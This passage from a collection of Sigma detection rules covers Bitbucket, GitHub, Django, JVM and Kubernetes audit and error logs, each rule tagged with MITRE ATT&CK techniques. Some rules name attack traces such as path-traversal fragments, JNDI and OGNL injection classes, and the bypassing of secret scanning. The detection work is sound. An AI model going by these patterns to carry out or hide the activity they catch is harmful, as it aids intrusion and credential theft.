id: 34d81081-03c9-4a7f-91c9-5e46af625cde
status: test
description: Detects when full data export is attempted an unauthorized user.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.collection
- attack.resource-development
- attack.t1213.003
- attack.t1586
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Data pipeline'
auditType.action: 'Unauthorized full data export triggered'
condition: selection
falsepositives:
- Unlikely
level: critical
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml
================================================
title: Bitbucket User Details Export Attempt Detected
id: 5259cbf2-0a75-48bf-b57a-c54d6fabaef3
status: test
description: Detects user data export activity.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.collection
- attack.reconnaissance
- attack.discovery
- attack.t1213
- attack.t1082
- attack.t1591.004
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Users and groups'
auditType.action:
- 'User permissions export failed'
- 'User permissions export started'
- 'User permissions exported'
condition: selection
falsepositives:
- Legitimate user activity.
level: medium
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml
================================================
title: Bitbucket User Login Failure
id: 70ed1d26-0050-4b38-a599-92c53d57d45a
status: test
description: |
Detects user authentication failure events.
Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.credential-access
- attack.t1078.004
- attack.t1110
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Authentication'
auditType.action: 'User login failed'
condition: selection
falsepositives:
- Legitimate user wrong password attempts.
level: medium
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml
================================================
title: Bitbucket User Login Failure Via SSH
id: d3f90469-fb05-42ce-b67d-0fded91bbef3
status: test
description: |
Detects SSH user login access failures.
Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.
references:
- https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html
- https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.lateral-movement
- attack.credential-access
- attack.t1021.004
- attack.t1110
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Authentication'
auditType.action: 'User login failed(SSH)'
condition: selection
falsepositives:
- Legitimate user wrong password attempts.
level: medium
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml
================================================
title: Bitbucket User Permissions Export Attempt
id: 87cc6698-3e07-4ba2-9b43-a85a73e151e2
status: test
description: Detects user permission data export attempt.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.reconnaissance
- attack.collection
- attack.discovery
- attack.t1213
- attack.t1082
- attack.t1591.004
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Users and groups'
auditType.action:
- 'User details export failed'
- 'User details export started'
- 'User details exported'
condition: selection
falsepositives:
- Legitimate user activity.
level: medium
================================================
FILE: rules/application/django/appframework_django_exceptions.yml
================================================
title: Django Framework Exceptions
id: fd435618-981e-4a7c-81f8-f78ce480d616
status: stable
description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
references:
- https://docs.djangoproject.com/en/1.11/ref/exceptions/
- https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
author: Thomas Patzke
date: 2017-08-05
modified: 2020-09-01
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: django
detection:
keywords:
- SuspiciousOperation
# Subclasses of SuspiciousOperation
- DisallowedHost
- DisallowedModelAdminLookup
- DisallowedModelAdminToField
- DisallowedRedirect
- InvalidSessionKey
- RequestDataTooBig
- SuspiciousFileOperation
- SuspiciousMultipartForm
- SuspiciousSession
- TooManyFieldsSent
# Further security-related exceptions
- PermissionDenied
condition: keywords
falsepositives:
- Application bugs
level: medium
================================================
FILE: rules/application/github/audit/github_delete_action_invoked.yml
================================================
title: Github Delete Action Invoked
id: 16a71777-0b2e-4db7-9888-9d59cb75200b
status: test
description: Detects delete action in the Github audit logs for codespaces, environment, project and repo.
author: Muhammad Faisal (@faisalusuf)
date: 2023-01-19
references:
- https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions
tags:
- attack.impact
- attack.collection
- attack.t1213.003
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'codespaces.delete'
- 'environment.delete'
- 'project.delete'
- 'repo.destroy'
condition: selection
falsepositives:
- Validate the deletion activity is permitted. The "actor" field need to be validated.
level: medium
================================================
FILE: rules/application/github/audit/github_disable_high_risk_configuration.yml
================================================
title: Github High Risk Configuration Disabled
id: 8622c92d-c00e-463c-b09d-fd06166f6794
status: test
description: Detects when a user disables a critical security feature for an organization.
references:
- https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization
- https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions
- https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository
- https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise
author: Muhammad Faisal (@faisalusuf)
date: 2023-01-29
modified: 2024-07-22
tags:
- attack.credential-access
- attack.defense-evasion
- attack.persistence
- attack.t1556
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'business_advanced_security.disabled_for_new_repos'
- 'business_advanced_security.disabled_for_new_user_namespace_repos'
- 'business_advanced_security.disabled'
- 'business_advanced_security.user_namespace_repos_disabled'
- 'org.advanced_security_disabled_for_new_repos'
- 'org.advanced_security_disabled_on_all_repos'
- 'org.advanced_security_policy_selected_member_disabled'
- 'org.disable_oauth_app_restrictions'
- 'org.disable_two_factor_requirement'
- 'repo.advanced_security_disabled'
condition: selection
falsepositives:
- Approved administrator/owner activities.
level: high
================================================
FILE: rules/application/github/audit/github_disabled_outdated_dependency_or_vulnerability.yml
================================================
title: Outdated Dependency Or Vulnerability Alert Disabled
id: 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d
status: test
description: |
Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.
This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.
author: Muhammad Faisal (@faisalusuf)
date: 2023-01-27
references:
- https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts
- https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization
tags:
- attack.initial-access
- attack.t1195.001
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'dependabot_alerts_new_repos.disable'
- 'dependabot_alerts.disable'
- 'dependabot_security_updates_new_repos.disable'
- 'dependabot_security_updates.disable'
- 'repository_vulnerability_alerts.disable'
condition: selection
falsepositives:
- Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes.
level: high
================================================
FILE: rules/application/github/audit/github_fork_private_repos_enabled_or_cleared.yml
================================================
title: Github Fork Private Repositories Setting Enabled/Cleared
id: 69b3bd1e-b38a-462f-9a23-fbdbf63d2294
status: test
description: |
Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
references:
- https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking
author: Romain Gaillard (@romain-gaillard)
date: 2024-07-29
tags:
- attack.persistence
- attack.exfiltration
- attack.t1020
- attack.t1537
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'private_repository_forking.clear' # An enterprise owner cleared the policy setting for allowing forks of private and internal repositories, for a repository, organization or enterprise.
- 'private_repository_forking.enable' # An enterprise owner enabled the policy setting for allowing forks of private and internal repositories, for a repository, organization or enterprise. Private and internal repositories are always allowed to be forked.
condition: selection
falsepositives:
- Allowed administrative activities.
level: medium
================================================
FILE: rules/application/github/audit/github_new_org_member.yml
================================================
title: New Github Organization Member Added
id: 3908d64a-3c06-4091-b503-b3a94424533b
status: test
description: Detects when a new member is added or invited to a github organization.
author: Muhammad Faisal (@faisalusuf)
date: 2023-01-29
references:
- https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions
tags:
- attack.persistence
- attack.t1136.003
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'org.add_member'
- 'org.invite_member'
condition: selection
falsepositives:
- Organization approved new members
level: informational
================================================
FILE: rules/application/github/audit/github_new_secret_created.yml
================================================
title: Github New Secret Created
id: f9405037-bc97-4eb7-baba-167dad399b83
status: test
description: Detects when a user creates action secret for the organization, environment, codespaces or repository.
author: Muhammad Faisal (@faisalusuf)
date: 2023-01-20
references:
- https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions
tags:
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.initial-access
- attack.t1078.004
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'codespaces.create_an_org_secret'
- 'environment.create_actions_secret'
- 'org.create_actions_secret'
- 'repo.create_actions_secret'
condition: selection
falsepositives:
- This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the "actor".
level: low
================================================
FILE: rules/application/github/audit/github_outside_collaborator_detected.yml
================================================
title: Github Outside Collaborator Detected
id: eaa9ac35-1730-441f-9587-25767bde99d7
status: test
description: |
Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
author: Muhammad Faisal (@faisalusuf)
date: 2023-01-20
references:
- https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions
- https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization
tags:
- attack.privilege-escalation
- attack.persistence
- attack.collection
- attack.t1098.001
- attack.t1098.003
- attack.t1213.003
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'org.remove_outside_collaborator'
- 'project.update_user_permission'
condition: selection
falsepositives:
- Validate the actor if permitted to access the repo.
- Validate the Multifactor Authentication changes.
level: medium
================================================
FILE: rules/application/github/audit/github_pages_site_changed_to_public.yml
================================================
title: GitHub Repository Pages Site Changed to Public
id: 0c46d4f4-a2bf-4104-9597-8d653fc2bb55
status: experimental
description: |
Detects when a GitHub Pages site of a repository is made public. This usually is part of a publishing process but could indicate or lead to potential unauthorized exposure of sensitive information or code.
references:
- https://docs.github.com/en/pages/getting-started-with-github-pages/creating-a-github-pages-site
- https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms
- https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events
author: Ivan Saakov
date: 2025-10-18
tags:
- attack.collection
- attack.exfiltration
- attack.t1567.001
logsource:
product: github
service: audit
detection:
selection:
action: 'repo.pages_public'
condition: selection
falsepositives:
- Legitimate publishing of repository pages by authorized users
level: low
================================================
FILE: rules/application/github/audit/github_push_protection_bypass_detected.yml
================================================
title: Github Push Protection Bypass Detected
id: 02cf536a-cf21-4876-8842-4159c8aee3cc
status: test
description: Detects when a user bypasses the push protection on a secret detected by secret scanning.
references:
- https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations
- https://thehackernews.com/2024/03/github-rolls-out-default-secret.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-03-07
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action|contains: 'secret_scanning_push_protection.bypass'
condition: selection
falsepositives:
- Allowed administrative activities.
level: low
================================================
FILE: rules/application/github/audit/github_push_protection_disabled.yml
================================================
title: Github Push Protection Disabled
id: ccd55945-badd-4bae-936b-823a735d37dd
status: test
description: Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.
references:
- https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations
- https://thehackernews.com/2024/03/github-rolls-out-default-secret.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-03-07
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'business_secret_scanning_custom_pattern_push_protection.disabled'
- 'business_secret_scanning_push_protection.disable'
- 'business_secret_scanning_push_protection.disabled_for_new_repos'
- 'org.secret_scanning_custom_pattern_push_protection_disabled'
- 'org.secret_scanning_push_protection_disable'
- 'org.secret_scanning_push_protection_new_repos_disable'
- 'repository_secret_scanning_custom_pattern_push_protection.disabled'
condition: selection
falsepositives:
- Allowed administrative activities.
level: high
================================================
FILE: rules/application/github/audit/github_repo_or_org_transferred.yml
================================================
title: Github Repository/Organization Transferred
id: 04ad83ef-1a37-4c10-b57a-81092164bf33
status: test
description: Detects when a repository or an organization is being transferred to another location.
references:
- https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository
- https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership
- https://docs.github.com/en/migrations
- https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration
author: Romain Gaillard (@romain-gaillard)
date: 2024-07-29
tags:
- attack.persistence
- attack.exfiltration
- attack.t1020
- attack.t1537
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'migration.create' # A migration file was created for transferring data from a source location (such as a GitHub.com organization or a GitHub Enterprise Server instance) to a target GitHub Enterprise Server instance.
- 'org.transfer_outgoing' # An organization was transferred between enterprise accounts.
- 'org.transfer' # An organization was transferred between enterprise accounts.
- 'repo.transfer_outgoing' # A repository was transferred to another repository network.
condition: selection
falsepositives:
- Allowed administrative activities.
level: medium
================================================
FILE: rules/application/github/audit/github_repository_archive_status_changed.yml
================================================
title: GitHub Repository Archive Status Changed
id: dca8991c-cb16-4128-abf8-6b11e5cd156f
status: experimental
description: |
Detects when a GitHub repository is archived or unarchived, which may indicate unauthorized changes to repository status.
references:
- https://docs.github.com/en/repositories/archiving-a-github-repository/archiving-repositories
- https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms
- https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events
author: Ivan Saakov
date: 2025-10-18
tags:
- attack.persistence
- attack.defense-evasion
- attack.impact
logsource:
product: github
service: audit
detection:
selection:
action:
- 'repo.archived'
- 'repo.unarchived'
condition: selection
falsepositives:
- Archiving or unarchiving a repository is often legitimate. Investigate this action to determine if it was authorized.
level: low
================================================
FILE: rules/application/github/audit/github_secret_scanning_feature_disabled.yml
================================================
title: Github Secret Scanning Feature Disabled
id: 3883d9a0-fd0f-440f-afbb-445a2a799bb8
status: test
description: Detects if the secret scanning feature is disabled for an enterprise or repository.
references:
- https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning
author: Muhammad Faisal (@faisalusuf)
date: 2024-03-07
modified: 2024-07-19
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'business_secret_scanning.disable'
- 'business_secret_scanning.disabled_for_new_repos'
- 'repository_secret_scanning.disable'
- 'secret_scanning_new_repos.disable'
- 'secret_scanning.disable'
condition: selection
falsepositives:
- Allowed administrative activities.
level: high
================================================
FILE: rules/application/github/audit/github_self_hosted_runner_changes_detected.yml
================================================
title: Github Self Hosted Runner Changes Detected
id: f8ed0e8f-7438-4b79-85eb-f358ef2fbebd
status: test
description: |
A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.
This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected,
it should be validated from GitHub UI because the log entry may not provide full context.
author: Muhammad Faisal (@faisalusuf)
date: 2023-01-27
references:
- https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners
- https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation
tags:
- attack.impact
- attack.discovery
- attack.collection
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.initial-access
- attack.t1526
- attack.t1213.003
- attack.t1078.004
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'org.remove_self_hosted_runner'
- 'org.runner_group_created'
- 'org.runner_group_removed'
- 'org.runner_group_runner_removed'
- 'org.runner_group_runners_added'
- 'org.runner_group_runners_updated'
- 'org.runner_group_updated'
- 'repo.register_self_hosted_runner'
- 'repo.remove_self_hosted_runner'
condition: selection
falsepositives:
- Allowed self-hosted runners changes in the environment.
- A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days.
- An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day.
level: low
================================================
FILE: rules/application/github/audit/github_ssh_certificate_config_changed.yml
================================================
title: Github SSH Certificate Configuration Changed
id: 2f575940-d85e-4ddc-af13-17dad6f1a0ef
status: test
description: Detects when changes are made to the SSH certificate configuration of the organization.
references:
- https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities
- https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority
author: Romain Gaillard (@romain-gaillard)
date: 2024-07-29
tags:
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.t1078.004
logsource:
product: github
service: audit
definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'
detection:
selection:
action:
- 'ssh_certificate_authority.create' # An SSH certificate authority for an organization or enterprise was created.
- 'ssh_certificate_requirement.disable' # The requirement for members to use SSH certificates to access an organization resources was disabled.
condition: selection
falsepositives:
- Allowed administrative activities.
level: medium
================================================
FILE: rules/application/jvm/java_jndi_injection_exploitation_attempt.yml
================================================
title: Potential JNDI Injection Exploitation In JVM Based Application
id: bb0e9cec-d4da-46f5-997f-22efc59f3dca
status: test
description: Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.
references:
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
- https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: jvm
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords:
- 'com.sun.jndi.ldap.'
- 'org.apache.logging.log4j.core.net.JndiManager'
condition: keywords
falsepositives:
- Application bugs
level: high
================================================
FILE: rules/application/jvm/java_local_file_read.yml
================================================
title: Potential Local File Read Vulnerability In JVM Based Application
id: e032f5bc-4563-4096-ae3b-064bab588685
status: test
description: |
Detects potential local file read vulnerability in JVM based apps.
If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.
references:
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: jvm
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords_local_file_read:
'|all':
- 'FileNotFoundException'
- '/../../..'
condition: keywords_local_file_read
falsepositives:
- Application bugs
level: high
================================================
FILE: rules/application/jvm/java_ognl_injection_exploitation_attempt.yml
================================================
title: Potential OGNL Injection Exploitation In JVM Based Application
id: 4d0af518-828e-4a04-a751-a7d03f3046ad
status: test
description: |
Detects potential OGNL Injection exploitation, which may lead to RCE.
OGNL is an expression language that is supported in many JVM based systems.
OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
references:
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
- cve.2017-5638
- cve.2022-26134
logsource:
category: application
product: jvm
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords:
- 'org.apache.commons.ognl.OgnlException'
- 'ExpressionSyntaxException'
condition: keywords
falsepositives:
- Application bugs
level: high
================================================
FILE: rules/application/jvm/java_rce_exploitation_attempt.yml
================================================
title: Process Execution Error In JVM Based Application
id: d65f37da-a26a-48f8-8159-3dde96680ad2
status: test
description: Detects process execution related exceptions in JVM based apps, often relates to RCE
references:
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: jvm
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords:
- 'Cannot run program'
- 'java.lang.ProcessImpl'
- 'java.lang.ProcessBuilder'
condition: keywords
falsepositives:
- Application bugs
level: high
================================================
FILE: rules/application/jvm/java_xxe_exploitation_attempt.yml
================================================
title: Potential XXE Exploitation Attempt In JVM Based Application
id: c4e06896-e27c-4583-95ac-91ce2279345d
status: test
description: Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.
references:
- https://rules.sonarsource.com/java/RSPEC-2755
- https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: jvm
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords:
- 'SAXParseException'
- 'DOMException'
condition: keywords
falsepositives:
- If the application expects to work with XML there may be parsing issues that don't necessarily mean XXE.
level: high
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml
================================================
title: Kubernetes Admission Controller Modification
id: eed82177-38f5-4299-8a76-098d50d225ab
related:
- id: 6ad91e31-53df-4826-bd27-0166171c8040
type: similar
status: test
description: |
Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
references:
- https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/
- https://security.padok.fr/en/blog/kubernetes-webhook-attackers
author: kelnage
date: 2024-07-11
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.t1078
- attack.credential-access
- attack.t1552
- attack.t1552.007
logsource:
product: kubernetes
service: audit
detection:
selection:
objectRef.apiGroup: 'admissionregistration.k8s.io'
objectRef.resource:
- 'mutatingwebhookconfigurations'
- 'validatingwebhookconfigurations'
verb:
- 'create'
- 'delete'
- 'patch'
- 'replace'
- 'update'
condition: selection
falsepositives:
- Modifying the Kubernetes Admission Controller may need to be done by a system administrator.
- Automated processes may need to take these actions and may need to be filtered.
level: medium
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml
================================================
title: Kubernetes CronJob/Job Modification
id: 0c9b3bda-41a6-4442-9345-356ae86343dc
related:
- id: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435
type: similar
status: test
description: |
Detects when a Kubernetes CronJob or Job is created or modified.
A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule.
An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.
references:
- https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/
- https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob
author: kelnage
date: 2024-07-11
tags:
- attack.persistence
- attack.privilege-escalation
- attack.execution
logsource:
product: kubernetes
service: audit
detection:
selection:
objectRef.apiGroup: 'batch'
objectRef.resource:
- 'cronjobs'
- 'jobs'
verb:
- 'create'
- 'delete'
- 'patch'
- 'replace'
- 'update'
condition: selection
falsepositives:
- Modifying a Kubernetes Job or CronJob may need to be done by a system administrator.
- Automated processes may need to take these actions and may need to be filtered.
level: medium
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_deployment_deleted.yml
================================================
title: Deployment Deleted From Kubernetes Cluster
id: 40967487-139b-4811-81d9-c9767a92aa5a
status: test
description: |
Detects the removal of a deployment from a Kubernetes cluster.
This could indicate disruptive activity aiming to impact business operations.
references:
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
- attack.t1498
- attack.impact
logsource:
category: application
product: kubernetes
service: audit
detection:
selection:
verb: 'delete'
objectRef.resource: 'deployments'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml
================================================
